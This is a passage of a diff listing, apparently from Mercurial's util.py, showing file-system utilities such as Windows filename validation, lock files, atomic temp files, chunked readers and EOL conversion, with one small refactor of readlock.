1785 1785 >>> checkwinfilename(b"../bar")
1786 1786 >>> checkwinfilename(b"foo\\")
1787 1787 "filename ends with '\\', which is invalid on Windows"
1788 1788 >>> checkwinfilename(b"foo\\/bar")
1789 1789 "directory name ends with '\\', which is invalid on Windows"
1790 1790 '''
1791 1791 if path.endswith('\\'):
1792 1792 return _("filename ends with '\\', which is invalid on Windows")
1793 1793 if '\\/' in path:
1794 1794 return _("directory name ends with '\\', which is invalid on Windows")
1795 1795 for n in path.replace('\\', '/').split('/'):
1796 1796 if not n:
1797 1797 continue
1798 1798 for c in _filenamebytestr(n):
1799 1799 if c in _winreservedchars:
1800 1800 return _("filename contains '%s', which is reserved "
1801 1801 "on Windows") % c
1802 1802 if ord(c) <= 31:
1803 1803 return _("filename contains '%s', which is invalid "
1804 1804 "on Windows") % stringutil.escapestr(c)
1805 1805 base = n.split('.')[0]
1806 1806 if base and base.lower() in _winreservednames:
1807 1807 return _("filename contains '%s', which is reserved "
1808 1808 "on Windows") % base
1809 1809 t = n[-1:]
1810 1810 if t in '. ' and n not in '..':
1811 1811 return _("filename ends with '%s', which is not allowed "
1812 1812 "on Windows") % t
1813 1813
1814 1814 if pycompat.iswindows:
1815 1815 checkosfilename = checkwinfilename
1816 1816 timer = time.clock
1817 1817 else:
1818 1818 checkosfilename = platform.checkosfilename
1819 1819 timer = time.time
1820 1820
1821 1821 if safehasattr(time, "perf_counter"):
1822 1822 timer = time.perf_counter
1823 1823
1824 1824 def makelock(info, pathname):
1825 1825 """Create a lock file atomically if possible
1826 1826
1827 1827     This may leave a stale lock file if symlinks aren't supported and a
1828 1828     signal interrupt arrives between creating and writing the lock file.
1829 1829 """
1830 1830 try:
1831 1831 return os.symlink(info, pathname)
1832 1832 except OSError as why:
1833 1833 if why.errno == errno.EEXIST:
1834 1834 raise
1835 1835 except AttributeError: # no symlink in os
1836 1836 pass
1837 1837
1838 1838 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1839 1839 ld = os.open(pathname, flags)
1840 1840 os.write(ld, info)
1841 1841 os.close(ld)
1842 1842
1843 1843 def readlock(pathname):
1844 1844 try:
1845 1845 return readlink(pathname)
1846 1846 except OSError as why:
1847 1847 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1848 1848 raise
1849 1849 except AttributeError: # no symlink in os
1850 1850 pass
1851 fp = posixfile(pathname, 'rb')
1852 r = fp.read()
1853 fp.close()
1854 return r
1851 with posixfile(pathname, 'rb') as fp:
1852 return fp.read()
1855 1853
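# The makelock()/readlock() pair sketched; by convention the lock content
# is 'hostname:pid' (values illustrative):
#
#   makelock(b'myhost:1234', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')  # -> b'myhost:1234'
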
1856 1854 def fstat(fp):
1857 1855 '''stat file object that may not have fileno method.'''
1858 1856 try:
1859 1857 return os.fstat(fp.fileno())
1860 1858 except AttributeError:
1861 1859 return os.stat(fp.name)
1862 1860
1863 1861 # File system features
1864 1862
1865 1863 def fscasesensitive(path):
1866 1864 """
1867 1865 Return true if the given path is on a case-sensitive filesystem
1868 1866
1869 1867 Requires a path (like /foo/.hg) ending with a foldable final
1870 1868 directory component.
1871 1869 """
1872 1870 s1 = os.lstat(path)
1873 1871 d, b = os.path.split(path)
1874 1872 b2 = b.upper()
1875 1873 if b == b2:
1876 1874 b2 = b.lower()
1877 1875 if b == b2:
1878 1876 return True # no evidence against case sensitivity
1879 1877 p2 = os.path.join(d, b2)
1880 1878 try:
1881 1879 s2 = os.lstat(p2)
1882 1880 if s2 == s1:
1883 1881 return False
1884 1882 return True
1885 1883 except OSError:
1886 1884 return True
1887 1885
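# Illustrative call: the path must end in a component whose case can fold,
# such as a repository's '.hg' directory:
#
#   fscasesensitive(b'/path/to/repo/.hg')  # False on default macOS APFS
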
1888 1886 try:
1889 1887 import re2
1890 1888 _re2 = None
1891 1889 except ImportError:
1892 1890 _re2 = False
1893 1891
1894 1892 class _re(object):
1895 1893 def _checkre2(self):
1896 1894 global _re2
1897 1895 try:
1898 1896 # check if match works, see issue3964
1899 1897 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1900 1898 except ImportError:
1901 1899 _re2 = False
1902 1900
1903 1901 def compile(self, pat, flags=0):
1904 1902 '''Compile a regular expression, using re2 if possible
1905 1903
1906 1904 For best performance, use only re2-compatible regexp features. The
1907 1905 only flags from the re module that are re2-compatible are
1908 1906 IGNORECASE and MULTILINE.'''
1909 1907 if _re2 is None:
1910 1908 self._checkre2()
1911 1909 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1912 1910 if flags & remod.IGNORECASE:
1913 1911 pat = '(?i)' + pat
1914 1912 if flags & remod.MULTILINE:
1915 1913 pat = '(?m)' + pat
1916 1914 try:
1917 1915 return re2.compile(pat)
1918 1916 except re2.error:
1919 1917 pass
1920 1918 return remod.compile(pat, flags)
1921 1919
1922 1920 @propertycache
1923 1921 def escape(self):
1924 1922 '''Return the version of escape corresponding to self.compile.
1925 1923
1926 1924 This is imperfect because whether re2 or re is used for a particular
1927 1925 function depends on the flags, etc, but it's the best we can do.
1928 1926 '''
1929 1927 global _re2
1930 1928 if _re2 is None:
1931 1929 self._checkre2()
1932 1930 if _re2:
1933 1931 return re2.escape
1934 1932 else:
1935 1933 return remod.escape
1936 1934
1937 1935 re = _re()
1938 1936
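# The module-level 're' singleton transparently prefers re2 when it is
# importable and the flags allow it; a hedged example:
#
#   pat = re.compile(br'hg-[0-9]+', remod.IGNORECASE)
#   pat.match(b'HG-42')  # matches, whichever engine was picked
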
1939 1937 _fspathcache = {}
1940 1938 def fspath(name, root):
1941 1939 '''Get name in the case stored in the filesystem
1942 1940
1943 1941 The name should be relative to root, and be normcase-ed for efficiency.
1944 1942
1945 1943 Note that this function is unnecessary, and should not be
1946 1944 called, for case-sensitive filesystems (simply because it's expensive).
1947 1945
1948 1946 The root should be normcase-ed, too.
1949 1947 '''
1950 1948 def _makefspathcacheentry(dir):
1951 1949 return dict((normcase(n), n) for n in os.listdir(dir))
1952 1950
1953 1951 seps = pycompat.ossep
1954 1952 if pycompat.osaltsep:
1955 1953 seps = seps + pycompat.osaltsep
1956 1954 # Protect backslashes. This gets silly very quickly.
1957 1955     seps = seps.replace('\\', '\\\\')
1958 1956 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1959 1957 dir = os.path.normpath(root)
1960 1958 result = []
1961 1959 for part, sep in pattern.findall(name):
1962 1960 if sep:
1963 1961 result.append(sep)
1964 1962 continue
1965 1963
1966 1964 if dir not in _fspathcache:
1967 1965 _fspathcache[dir] = _makefspathcacheentry(dir)
1968 1966 contents = _fspathcache[dir]
1969 1967
1970 1968 found = contents.get(part)
1971 1969 if not found:
1972 1970 # retry "once per directory" per "dirstate.walk" which
1973 1971             # may take place for each patch of "hg qpush", for example
1974 1972 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1975 1973 found = contents.get(part)
1976 1974
1977 1975 result.append(found or part)
1978 1976 dir = os.path.join(dir, part)
1979 1977
1980 1978 return ''.join(result)
1981 1979
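# Sketch: recovering on-disk case on a case-insensitive filesystem (result
# illustrative; both arguments must already be normcase-ed):
#
#   fspath(b'foo/readme.txt', b'/repo')  # might return b'Foo/README.txt'
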
1982 1980 def checknlink(testfile):
1983 1981 '''check whether hardlink count reporting works properly'''
1984 1982
1985 1983 # testfile may be open, so we need a separate file for checking to
1986 1984 # work around issue2543 (or testfile may get lost on Samba shares)
1987 1985 f1, f2, fp = None, None, None
1988 1986 try:
1989 1987 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1990 1988 suffix='1~', dir=os.path.dirname(testfile))
1991 1989 os.close(fd)
1992 1990 f2 = '%s2~' % f1[:-2]
1993 1991
1994 1992 oslink(f1, f2)
1995 1993 # nlinks() may behave differently for files on Windows shares if
1996 1994 # the file is open.
1997 1995 fp = posixfile(f2)
1998 1996 return nlinks(f2) > 1
1999 1997 except OSError:
2000 1998 return False
2001 1999 finally:
2002 2000 if fp is not None:
2003 2001 fp.close()
2004 2002 for f in (f1, f2):
2005 2003 try:
2006 2004 if f is not None:
2007 2005 os.unlink(f)
2008 2006 except OSError:
2009 2007 pass
2010 2008
2011 2009 def endswithsep(path):
2012 2010 '''Check path ends with os.sep or os.altsep.'''
2013 2011 return (path.endswith(pycompat.ossep)
2014 2012 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2015 2013
2016 2014 def splitpath(path):
2017 2015 '''Split path by os.sep.
2018 2016 Note that this function does not use os.altsep because this is
2019 2017     an alternative to a simple "xxx.split(os.sep)".
2020 2018     It is recommended to use os.path.normpath() before using this
2021 2019     function if needed.'''
2022 2020 return path.split(pycompat.ossep)
2023 2021
2024 2022 def mktempcopy(name, emptyok=False, createmode=None):
2025 2023 """Create a temporary file with the same contents from name
2026 2024
2027 2025 The permission bits are copied from the original file.
2028 2026
2029 2027 If the temporary file is going to be truncated immediately, you
2030 2028 can use emptyok=True as an optimization.
2031 2029
2032 2030 Returns the name of the temporary file.
2033 2031 """
2034 2032 d, fn = os.path.split(name)
2035 2033 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2036 2034 os.close(fd)
2037 2035 # Temporary files are created with mode 0600, which is usually not
2038 2036 # what we want. If the original file already exists, just copy
2039 2037 # its mode. Otherwise, manually obey umask.
2040 2038 copymode(name, temp, createmode)
2041 2039 if emptyok:
2042 2040 return temp
2043 2041 try:
2044 2042 try:
2045 2043 ifp = posixfile(name, "rb")
2046 2044 except IOError as inst:
2047 2045 if inst.errno == errno.ENOENT:
2048 2046 return temp
2049 2047 if not getattr(inst, 'filename', None):
2050 2048 inst.filename = name
2051 2049 raise
2052 2050 ofp = posixfile(temp, "wb")
2053 2051 for chunk in filechunkiter(ifp):
2054 2052 ofp.write(chunk)
2055 2053 ifp.close()
2056 2054 ofp.close()
2057 2055 except: # re-raises
2058 2056 try:
2059 2057 os.unlink(temp)
2060 2058 except OSError:
2061 2059 pass
2062 2060 raise
2063 2061 return temp
2064 2062
2065 2063 class filestat(object):
2066 2064     """helper to exactly detect changes to a file
2067 2065
2068 2066     The 'stat' attribute is the result of 'os.stat()' if the specified
2069 2067     'path' exists; otherwise it is None. This saves callers of this
2070 2068     class a preparatory 'exists()' check.
2071 2069 """
2072 2070 def __init__(self, stat):
2073 2071 self.stat = stat
2074 2072
2075 2073 @classmethod
2076 2074 def frompath(cls, path):
2077 2075 try:
2078 2076 stat = os.stat(path)
2079 2077 except OSError as err:
2080 2078 if err.errno != errno.ENOENT:
2081 2079 raise
2082 2080 stat = None
2083 2081 return cls(stat)
2084 2082
2085 2083 @classmethod
2086 2084 def fromfp(cls, fp):
2087 2085 stat = os.fstat(fp.fileno())
2088 2086 return cls(stat)
2089 2087
2090 2088 __hash__ = object.__hash__
2091 2089
2092 2090 def __eq__(self, old):
2093 2091 try:
2094 2092 # if ambiguity between stat of new and old file is
2095 2093 # avoided, comparison of size, ctime and mtime is enough
2096 2094 # to exactly detect change of a file regardless of platform
2097 2095 return (self.stat.st_size == old.stat.st_size and
2098 2096 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2099 2097 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2100 2098 except AttributeError:
2101 2099 pass
2102 2100 try:
2103 2101 return self.stat is None and old.stat is None
2104 2102 except AttributeError:
2105 2103 return False
2106 2104
2107 2105 def isambig(self, old):
2108 2106 """Examine whether new (= self) stat is ambiguous against old one
2109 2107
2110 2108 "S[N]" below means stat of a file at N-th change:
2111 2109
2112 2110 - S[n-1].ctime < S[n].ctime: can detect change of a file
2113 2111 - S[n-1].ctime == S[n].ctime
2114 2112 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2115 2113 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2116 2114 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2117 2115 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2118 2116
2119 2117         Case (*2) above means that a file was changed twice or more
2120 2118         within the same second (= S[n-1].ctime), so comparing the
2121 2119         timestamps is ambiguous.
2122 2120
2123 2121         The basic idea to avoid such ambiguity is "advance mtime by 1
2124 2122         sec, if the timestamp is ambiguous".
2125 2123
2126 2124         But advancing mtime only in case (*2) doesn't work as
2127 2125         expected, because a naturally advanced S[n].mtime in case (*1)
2128 2126         might be equal to a manually advanced S[n-1 or earlier].mtime.
2129 2127
2130 2128         Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2131 2129         treated as ambiguous regardless of mtime, to avoid overlooking
2132 2130         changes caused by collisions between such mtimes.
2133 2131
2134 2132         Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2135 2133         S[n].mtime", even if the size of the file isn't changed.
2136 2134 """
2137 2135 try:
2138 2136 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2139 2137 except AttributeError:
2140 2138 return False
2141 2139
2142 2140 def avoidambig(self, path, old):
2143 2141 """Change file stat of specified path to avoid ambiguity
2144 2142
2145 2143 'old' should be previous filestat of 'path'.
2146 2144
2147 2145 This skips avoiding ambiguity, if a process doesn't have
2148 2146 appropriate privileges for 'path'. This returns False in this
2149 2147 case.
2150 2148
2151 2149 Otherwise, this returns True, as "ambiguity is avoided".
2152 2150 """
2153 2151 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2154 2152 try:
2155 2153 os.utime(path, (advanced, advanced))
2156 2154 except OSError as inst:
2157 2155 if inst.errno == errno.EPERM:
2158 2156 # utime() on the file created by another user causes EPERM,
2159 2157 # if a process doesn't have appropriate privileges
2160 2158 return False
2161 2159 raise
2162 2160 return True
2163 2161
2164 2162 def __ne__(self, other):
2165 2163 return not self == other
2166 2164
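# A hedged sketch of the ambiguity-avoidance dance with filestat, for a
# file rewritten within the same second (path illustrative):
#
#   old = filestat.frompath(b'.hg/dirstate')
#   # ... rewrite .hg/dirstate ...
#   new = filestat.frompath(b'.hg/dirstate')
#   if new.isambig(old):
#       new.avoidambig(b'.hg/dirstate', old)
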
2167 2165 class atomictempfile(object):
2168 2166 '''writable file object that atomically updates a file
2169 2167
2170 2168 All writes will go to a temporary copy of the original file. Call
2171 2169 close() when you are done writing, and atomictempfile will rename
2172 2170 the temporary copy to the original name, making the changes
2173 2171 visible. If the object is destroyed without being closed, all your
2174 2172 writes are discarded.
2175 2173
2176 2174     The checkambig constructor argument is used with filestat, and is
2177 2175     useful only if the target file is guarded by a lock (e.g. repo.lock
2178 2176     or repo.wlock).
2179 2177 '''
2180 2178 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2181 2179 self.__name = name # permanent name
2182 2180 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2183 2181 createmode=createmode)
2184 2182 self._fp = posixfile(self._tempname, mode)
2185 2183 self._checkambig = checkambig
2186 2184
2187 2185 # delegated methods
2188 2186 self.read = self._fp.read
2189 2187 self.write = self._fp.write
2190 2188 self.seek = self._fp.seek
2191 2189 self.tell = self._fp.tell
2192 2190 self.fileno = self._fp.fileno
2193 2191
2194 2192 def close(self):
2195 2193 if not self._fp.closed:
2196 2194 self._fp.close()
2197 2195 filename = localpath(self.__name)
2198 2196 oldstat = self._checkambig and filestat.frompath(filename)
2199 2197 if oldstat and oldstat.stat:
2200 2198 rename(self._tempname, filename)
2201 2199 newstat = filestat.frompath(filename)
2202 2200 if newstat.isambig(oldstat):
2203 2201 # stat of changed file is ambiguous to original one
2204 2202 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2205 2203 os.utime(filename, (advanced, advanced))
2206 2204 else:
2207 2205 rename(self._tempname, filename)
2208 2206
2209 2207 def discard(self):
2210 2208 if not self._fp.closed:
2211 2209 try:
2212 2210 os.unlink(self._tempname)
2213 2211 except OSError:
2214 2212 pass
2215 2213 self._fp.close()
2216 2214
2217 2215 def __del__(self):
2218 2216 if safehasattr(self, '_fp'): # constructor actually did something
2219 2217 self.discard()
2220 2218
2221 2219 def __enter__(self):
2222 2220 return self
2223 2221
2224 2222 def __exit__(self, exctype, excvalue, traceback):
2225 2223 if exctype is not None:
2226 2224 self.discard()
2227 2225 else:
2228 2226 self.close()
2229 2227
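# atomictempfile is a context manager, so a hedged typical use is:
#
#   with atomictempfile(b'some-file', mode='wb') as fp:
#       fp.write(b'content\n')
#   # renamed into place on clean exit; discarded if an exception escapes
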
2230 2228 def unlinkpath(f, ignoremissing=False, rmdir=True):
2231 2229 """unlink and remove the directory if it is empty"""
2232 2230 if ignoremissing:
2233 2231 tryunlink(f)
2234 2232 else:
2235 2233 unlink(f)
2236 2234 if rmdir:
2237 2235 # try removing directories that might now be empty
2238 2236 try:
2239 2237 removedirs(os.path.dirname(f))
2240 2238 except OSError:
2241 2239 pass
2242 2240
2243 2241 def tryunlink(f):
2244 2242 """Attempt to remove a file, ignoring ENOENT errors."""
2245 2243 try:
2246 2244 unlink(f)
2247 2245 except OSError as e:
2248 2246 if e.errno != errno.ENOENT:
2249 2247 raise
2250 2248
2251 2249 def makedirs(name, mode=None, notindexed=False):
2252 2250 """recursive directory creation with parent mode inheritance
2253 2251
2254 2252 Newly created directories are marked as "not to be indexed by
2255 2253 the content indexing service", if ``notindexed`` is specified
2256 2254 for "write" mode access.
2257 2255 """
2258 2256 try:
2259 2257 makedir(name, notindexed)
2260 2258 except OSError as err:
2261 2259 if err.errno == errno.EEXIST:
2262 2260 return
2263 2261 if err.errno != errno.ENOENT or not name:
2264 2262 raise
2265 2263 parent = os.path.dirname(os.path.abspath(name))
2266 2264 if parent == name:
2267 2265 raise
2268 2266 makedirs(parent, mode, notindexed)
2269 2267 try:
2270 2268 makedir(name, notindexed)
2271 2269 except OSError as err:
2272 2270 # Catch EEXIST to handle races
2273 2271 if err.errno == errno.EEXIST:
2274 2272 return
2275 2273 raise
2276 2274 if mode is not None:
2277 2275 os.chmod(name, mode)
2278 2276
2279 2277 def readfile(path):
2280 2278 with open(path, 'rb') as fp:
2281 2279 return fp.read()
2282 2280
2283 2281 def writefile(path, text):
2284 2282 with open(path, 'wb') as fp:
2285 2283 fp.write(text)
2286 2284
2287 2285 def appendfile(path, text):
2288 2286 with open(path, 'ab') as fp:
2289 2287 fp.write(text)
2290 2288
2291 2289 class chunkbuffer(object):
2292 2290 """Allow arbitrary sized chunks of data to be efficiently read from an
2293 2291 iterator over chunks of arbitrary size."""
2294 2292
2295 2293 def __init__(self, in_iter):
2296 2294 """in_iter is the iterator that's iterating over the input chunks."""
2297 2295 def splitbig(chunks):
2298 2296 for chunk in chunks:
2299 2297 if len(chunk) > 2**20:
2300 2298 pos = 0
2301 2299 while pos < len(chunk):
2302 2300 end = pos + 2 ** 18
2303 2301 yield chunk[pos:end]
2304 2302 pos = end
2305 2303 else:
2306 2304 yield chunk
2307 2305 self.iter = splitbig(in_iter)
2308 2306 self._queue = collections.deque()
2309 2307 self._chunkoffset = 0
2310 2308
2311 2309 def read(self, l=None):
2312 2310 """Read L bytes of data from the iterator of chunks of data.
2313 2311 Returns less than L bytes if the iterator runs dry.
2314 2312
2315 2313         If the size parameter is omitted, read everything."""
2316 2314 if l is None:
2317 2315 return ''.join(self.iter)
2318 2316
2319 2317 left = l
2320 2318 buf = []
2321 2319 queue = self._queue
2322 2320 while left > 0:
2323 2321 # refill the queue
2324 2322 if not queue:
2325 2323 target = 2**18
2326 2324 for chunk in self.iter:
2327 2325 queue.append(chunk)
2328 2326 target -= len(chunk)
2329 2327 if target <= 0:
2330 2328 break
2331 2329 if not queue:
2332 2330 break
2333 2331
2334 2332 # The easy way to do this would be to queue.popleft(), modify the
2335 2333 # chunk (if necessary), then queue.appendleft(). However, for cases
2336 2334 # where we read partial chunk content, this incurs 2 dequeue
2337 2335 # mutations and creates a new str for the remaining chunk in the
2338 2336 # queue. Our code below avoids this overhead.
2339 2337
2340 2338 chunk = queue[0]
2341 2339 chunkl = len(chunk)
2342 2340 offset = self._chunkoffset
2343 2341
2344 2342 # Use full chunk.
2345 2343 if offset == 0 and left >= chunkl:
2346 2344 left -= chunkl
2347 2345 queue.popleft()
2348 2346 buf.append(chunk)
2349 2347 # self._chunkoffset remains at 0.
2350 2348 continue
2351 2349
2352 2350 chunkremaining = chunkl - offset
2353 2351
2354 2352 # Use all of unconsumed part of chunk.
2355 2353 if left >= chunkremaining:
2356 2354 left -= chunkremaining
2357 2355 queue.popleft()
2358 2356 # offset == 0 is enabled by block above, so this won't merely
2359 2357 # copy via ``chunk[0:]``.
2360 2358 buf.append(chunk[offset:])
2361 2359 self._chunkoffset = 0
2362 2360
2363 2361 # Partial chunk needed.
2364 2362 else:
2365 2363 buf.append(chunk[offset:offset + left])
2366 2364 self._chunkoffset += left
2367 2365 left -= chunkremaining
2368 2366
2369 2367 return ''.join(buf)
2370 2368
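# Sketch: draining a chunkbuffer built over unevenly sized chunks (sizes
# illustrative):
#
#   cb = chunkbuffer(iter([b'abc', b'defg']))
#   cb.read(2)  # -> b'ab'
#   cb.read(5)  # -> b'cdefg'
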
2371 2369 def filechunkiter(f, size=131072, limit=None):
2372 2370     """Create a generator that produces the data in the file, size
2373 2371     (default 131072) bytes at a time, up to an optional limit (default is
2374 2372 to read all data). Chunks may be less than size bytes if the
2375 2373 chunk is the last chunk in the file, or the file is a socket or
2376 2374 some other type of file that sometimes reads less data than is
2377 2375 requested."""
2378 2376 assert size >= 0
2379 2377 assert limit is None or limit >= 0
2380 2378 while True:
2381 2379 if limit is None:
2382 2380 nbytes = size
2383 2381 else:
2384 2382 nbytes = min(limit, size)
2385 2383 s = nbytes and f.read(nbytes)
2386 2384 if not s:
2387 2385 break
2388 2386 if limit:
2389 2387 limit -= len(s)
2390 2388 yield s
2391 2389
2392 2390 class cappedreader(object):
2393 2391 """A file object proxy that allows reading up to N bytes.
2394 2392
2395 2393 Given a source file object, instances of this type allow reading up to
2396 2394 N bytes from that source file object. Attempts to read past the allowed
2397 2395 limit are treated as EOF.
2398 2396
2399 2397     It is assumed that no I/O is performed on the original file object
2400 2398     other than the I/O performed by this instance. If there is, state
2401 2399     tracking will get out of sync and unexpected results will ensue.
2402 2400 """
2403 2401 def __init__(self, fh, limit):
2404 2402 """Allow reading up to <limit> bytes from <fh>."""
2405 2403 self._fh = fh
2406 2404 self._left = limit
2407 2405
2408 2406 def read(self, n=-1):
2409 2407 if not self._left:
2410 2408 return b''
2411 2409
2412 2410 if n < 0:
2413 2411 n = self._left
2414 2412
2415 2413 data = self._fh.read(min(n, self._left))
2416 2414 self._left -= len(data)
2417 2415 assert self._left >= 0
2418 2416
2419 2417 return data
2420 2418
2421 2419 def readinto(self, b):
2422 2420 res = self.read(len(b))
2423 2421 if res is None:
2424 2422 return None
2425 2423
2426 2424 b[0:len(res)] = res
2427 2425 return len(res)
2428 2426
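# Sketch, assuming a stdlib io.BytesIO as the source file object:
#
#   capped = cappedreader(io.BytesIO(b'0123456789'), 4)
#   capped.read()   # -> b'0123'
#   capped.read(1)  # -> b'' (the limit reads as EOF)
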
2429 2427 def unitcountfn(*unittable):
2430 2428 '''return a function that renders a readable count of some quantity'''
2431 2429
2432 2430 def go(count):
2433 2431 for multiplier, divisor, format in unittable:
2434 2432 if abs(count) >= divisor * multiplier:
2435 2433 return format % (count / float(divisor))
2436 2434 return unittable[-1][2] % count
2437 2435
2438 2436 return go
2439 2437
2440 2438 def processlinerange(fromline, toline):
2441 2439 """Check that linerange <fromline>:<toline> makes sense and return a
2442 2440 0-based range.
2443 2441
2444 2442 >>> processlinerange(10, 20)
2445 2443 (9, 20)
2446 2444 >>> processlinerange(2, 1)
2447 2445 Traceback (most recent call last):
2448 2446 ...
2449 2447 ParseError: line range must be positive
2450 2448 >>> processlinerange(0, 5)
2451 2449 Traceback (most recent call last):
2452 2450 ...
2453 2451 ParseError: fromline must be strictly positive
2454 2452 """
2455 2453 if toline - fromline < 0:
2456 2454 raise error.ParseError(_("line range must be positive"))
2457 2455 if fromline < 1:
2458 2456 raise error.ParseError(_("fromline must be strictly positive"))
2459 2457 return fromline - 1, toline
2460 2458
2461 2459 bytecount = unitcountfn(
2462 2460 (100, 1 << 30, _('%.0f GB')),
2463 2461 (10, 1 << 30, _('%.1f GB')),
2464 2462 (1, 1 << 30, _('%.2f GB')),
2465 2463 (100, 1 << 20, _('%.0f MB')),
2466 2464 (10, 1 << 20, _('%.1f MB')),
2467 2465 (1, 1 << 20, _('%.2f MB')),
2468 2466 (100, 1 << 10, _('%.0f KB')),
2469 2467 (10, 1 << 10, _('%.1f KB')),
2470 2468 (1, 1 << 10, _('%.2f KB')),
2471 2469 (1, 1, _('%.0f bytes')),
2472 2470 )
2473 2471
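# Illustrative renderings from the table above:
#
#   bytecount(100)      # -> '100 bytes'
#   bytecount(2252)     # -> '2.20 KB'
#   bytecount(6291456)  # -> '6.00 MB'
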
2474 2472 class transformingwriter(object):
2475 2473 """Writable file wrapper to transform data by function"""
2476 2474
2477 2475 def __init__(self, fp, encode):
2478 2476 self._fp = fp
2479 2477 self._encode = encode
2480 2478
2481 2479 def close(self):
2482 2480 self._fp.close()
2483 2481
2484 2482 def flush(self):
2485 2483 self._fp.flush()
2486 2484
2487 2485 def write(self, data):
2488 2486 return self._fp.write(self._encode(data))
2489 2487
2490 2488 # Matches a single EOL which can either be a CRLF where repeated CR
2491 2489 # are removed or a LF. We do not care about old Macintosh files, so a
2492 2490 # stray CR is an error.
2493 2491 _eolre = remod.compile(br'\r*\n')
2494 2492
2495 2493 def tolf(s):
2496 2494 return _eolre.sub('\n', s)
2497 2495
2498 2496 def tocrlf(s):
2499 2497 return _eolre.sub('\r\n', s)
2500 2498
2501 2499 def _crlfwriter(fp):
2502 2500 return transformingwriter(fp, tocrlf)
2503 2501
2504 2502 if pycompat.oslinesep == '\r\n':
2505 2503 tonativeeol = tocrlf
2506 2504 fromnativeeol = tolf
2507 2505 nativeeolwriter = _crlfwriter
2508 2506 else:
2509 2507 tonativeeol = pycompat.identity
2510 2508 fromnativeeol = pycompat.identity
2511 2509 nativeeolwriter = pycompat.identity
2512 2510
2513 2511 if (pyplatform.python_implementation() == 'CPython' and
2514 2512 sys.version_info < (3, 0)):
2515 2513 # There is an issue in CPython that some IO methods do not handle EINTR
2516 2514 # correctly. The following table shows what CPython version (and functions)
2517 2515 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 2516 #
2519 2517 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 2518 # --------------------------------------------------
2521 2519 # fp.__iter__ | buggy | buggy | okay
2522 2520 # fp.read* | buggy | okay [1] | okay
2523 2521 #
2524 2522 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 2523 #
2526 2524 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 2525 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 2526 #
2529 2527 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 2528 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 2529 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 2530 # fp.__iter__ but not other fp.read* methods.
2533 2531 #
2534 2532 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 2533 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 2534 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 2535 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 2536 # to minimize the performance impact.
2539 2537 if sys.version_info >= (2, 7, 4):
2540 2538 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 2539 def _safeiterfile(fp):
2542 2540 return iter(fp.readline, '')
2543 2541 else:
2544 2542 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 2543 # note: this may block longer than necessary because of bufsize.
2546 2544 def _safeiterfile(fp, bufsize=4096):
2547 2545 fd = fp.fileno()
2548 2546 line = ''
2549 2547 while True:
2550 2548 try:
2551 2549 buf = os.read(fd, bufsize)
2552 2550 except OSError as ex:
2553 2551 # os.read only raises EINTR before any data is read
2554 2552 if ex.errno == errno.EINTR:
2555 2553 continue
2556 2554 else:
2557 2555 raise
2558 2556 line += buf
2559 2557 if '\n' in buf:
2560 2558 splitted = line.splitlines(True)
2561 2559 line = ''
2562 2560 for l in splitted:
2563 2561 if l[-1] == '\n':
2564 2562 yield l
2565 2563 else:
2566 2564 line = l
2567 2565 if not buf:
2568 2566 break
2569 2567 if line:
2570 2568 yield line
2571 2569
2572 2570 def iterfile(fp):
2573 2571 fastpath = True
2574 2572 if type(fp) is file:
2575 2573 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 2574 if fastpath:
2577 2575 return fp
2578 2576 else:
2579 2577 return _safeiterfile(fp)
2580 2578 else:
2581 2579 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 2580 def iterfile(fp):
2583 2581 return fp
2584 2582
2585 2583 def iterlines(iterator):
2586 2584 for chunk in iterator:
2587 2585 for line in chunk.splitlines():
2588 2586 yield line
2589 2587
2590 2588 def expandpath(path):
2591 2589 return os.path.expanduser(os.path.expandvars(path))
2592 2590
2593 2591 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2594 2592 """Return the result of interpolating items in the mapping into string s.
2595 2593
2596 2594 prefix is a single character string, or a two character string with
2597 2595 a backslash as the first character if the prefix needs to be escaped in
2598 2596 a regular expression.
2599 2597
2600 2598 fn is an optional function that will be applied to the replacement text
2601 2599 just before replacement.
2602 2600
2603 2601 escape_prefix is an optional flag that allows using doubled prefix for
2604 2602 its escaping.
2605 2603 """
2606 2604 fn = fn or (lambda s: s)
2607 2605 patterns = '|'.join(mapping.keys())
